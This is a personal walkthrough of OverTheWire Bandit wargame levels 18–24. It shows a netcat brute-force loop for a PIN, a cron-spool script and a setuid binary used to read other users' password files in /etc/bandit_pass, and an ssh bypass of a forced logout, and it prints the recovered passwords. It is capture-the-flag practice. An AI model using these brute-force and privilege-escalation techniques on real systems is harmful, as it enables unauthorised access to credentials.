OTW – Bandit

These are security problems from OverTheWire. Bandit is for beginners. Note I put the answer here as well since I use this as a record when I stop.

Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinaties, called brute-forcing.


Again, I created a folder inside /tmp and make sure both the newly created folder and all the file related to this level must have proper permission (chmod 755 would be enough).

#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

for a in {0..9}{0..9}{0..9}{0..9}
do
    echo $passwd' '$a | nc localhost 30002 >> result &
done

I choose to use netcat (nc) but telnet works just as well. The passcode a is being generated by 4 brace expansions. The >> append the output to the file result. The & put the command in background so it can start the next iteration. Doing so save me a lot of time waiting for this script to be done. To improve upon this, I need to find a way to terminate the loop when the correct answer is displayed. However, I didn’t know what the correct message would be at the beginning.

Using the same strategy to find an unique line from Level 8 → Level 9, we see the password for the next level is the unique line of result file.

$ sort result | uniq -u
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Additional References:

Bandit Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…


Doing the same thing from last level, we found the following script

cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in *;
do
    echo "Handling $i"
    ./$i
    rm -f $i
done

From the description of the script, it will execute all the script inside the $myname folder. We found that there is a bandit24 folder in /var/spool/. Therefore, let’s get a simple script of copying the password to a tmp folder (like two levels before)

mkdir /tmp/b23abc
vim /tmp/b23abc/getpass.sh
cat /tmp/b23abc/getpass.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > tmp/b23abc/pass.txt

At this point, I can copy the file to /var/spool/bandit24/ but I remember the permission for execute must be set.

chmod 777 /tmp/b23abc/getpass.sh
cp /tmp/b23abc/getpass.sh /var/spool/bandit24/

However, after couple minutes, I did not get a pass.txt appear in the folder. What I forgot is to set the permission of the folder that the pass.txt is writing into. Wait for a minute and find the file and the content of the next password.

chmod 777 /tmp/b23ac/
cat /tmp/b23abc/pass.txt
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Bandit Level 22 → Level 23

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

Commands you may need to solve this level

cron, crontab, crontab(5) (use “man 5 crontab” to access this)


Doing the same thing from last level, we found the following script

cat cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null

cat /usr/bin/cronjob_bandit23.sh

#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

I notice whoami give me the current user. In this case bandit22. So I should change that but I wasn’t sure how. Let’s run the script and see what happen.

/usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3

So I know if we change from bandit22 to bandit23, we will get a file that have the password for bandit23. The long file name is a hash (md5) from mytarget. Let execute that same line but switch $myname to bandit23. We got another long string and looking at the content of this file in tmp folder gives us the next password.

echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Bandit Level 21 → Level 22

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Commands you may need to solve this level

cron, crontab, crontab(5) (use “man 5 crontab” to access this)


From the level goal, we can first visit /etc/cron.d and find some files. In particular the file named cronjob_bandit22 seem to be the one we might be interested. It shows the location of a cron_job_bandit22.sh script. We once again, look at the script.

cat cronjob_bandit22
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Someone is dumping the password of bandit22 into a tmp file. We once again cat the tmp file and find the next password.

cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Bandit Level 20 → Level 21

Level Goal

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think


We can see suconnect will need to be execute. Let see what it is for.

./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. 
If it receives the correct password from the other side, the next 
password is transmitted back.

Like the NOTE suggest, we need two instances where one listen for a port and another read and send back the password for the next level. We use nc to listen to a port of our choosing and send the current password to the port.

nc -l 32123 < /etc/bandit_pass/bandit20

In another ssh session, we start suconnect on the same port and immediately greeted with what we send to it.

./suconnect 32123
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password

If you look at the first ssh session, the following message will pop up with the next password.

gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Additional References:

Bandit Level 19 → Level 20

Level Goal

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.


Looking at the home directory, we see a file bandit20-do is created by bandit20 and accessible by bandit19. The permission of the file is rws. The s permission means when the file is executed, it will run with the permission of the owner.

-rwsr-x--- 1 bandit20 bandit19 7237 Jun 6 2013 bandit20-do

Since the owner is bandit20, we can try to run this and use the elevated permission to look at the next password as well. Just running it tell us we can run a command.

./bandit20-do
Run a command as another user.
 Example: ./bandit20-do id

In this case, let’s cat the password file and find out the next password for bandit20.

./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Additional References:

Bandit Level 18 → Level 19

Level Goal

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

Commands you may need to solve this level

ssh, ls, cat


From ssh man page, we can actually append an command after our login to execute it. Since we know which file the password stored, we can just display the file before we got logout

ssh bandit18@bandit.labs.overthewire.org cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

Another way is to use scp, secure file transfer using the private key we created from level16→level17 to copy the file from bandit18 home directory to /tmp. Everything done inside bandit17 with the bandit18 login password. The next password from both methods are the same as expected.

scp -i /tmp/key/b16pkey bandit18@localhost:readme /tmp/tmpfile/readme
cat /tmp/tmpfile/readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5